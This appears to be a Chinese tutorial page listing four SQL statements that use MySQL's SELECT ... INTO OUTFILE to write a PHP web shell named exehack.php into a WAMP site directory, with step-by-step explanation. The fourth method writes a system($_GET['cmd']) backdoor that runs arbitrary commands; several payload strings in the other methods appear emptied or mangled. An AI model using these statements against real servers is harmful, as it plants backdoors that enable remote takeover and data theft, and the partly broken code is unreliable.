方法一:
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('');SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/exehack.php';DROP TABLE IF EXISTS `darkmoon`;
以上代码意思就是选择musql数据库 然后建立一个darkmoon的表然后加入一个名字为darkmoon1的字段
然后在darkmoon1的字段中插入一句话代码
然后从darkmoon1字段里面导出一句话到d:/wamp/www/exehack.php 的文件名(这里的路径就是网站的程序路径)
最后就是删除darkmoon这个表。
方法二:
Create TABLE moon (darkmoon text NOT NULL); Insert INTO moon (darkmoon) VALUES(''); select darkmoon from moon into outfile 'd:/wamp/www/exehack.php'; Drop TABLE IF EXISTS moon;
方法三:
select ''INTO OUTFILE 'd:/wamp/www/exehack.php'
方法四:
select '\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'd:/wamp/www/exehack.php'
这个可以直接执行cmd命令,参数为cmd
Copyright © 2019- huatuo9.cn 版权所有 赣ICP备2023008801号-1
违法及侵权请联系:TEL:199 18 7713 E-MAIL:2724546146@qq.com
本站由北京市万商天勤律师事务所王兴未律师提供法律服务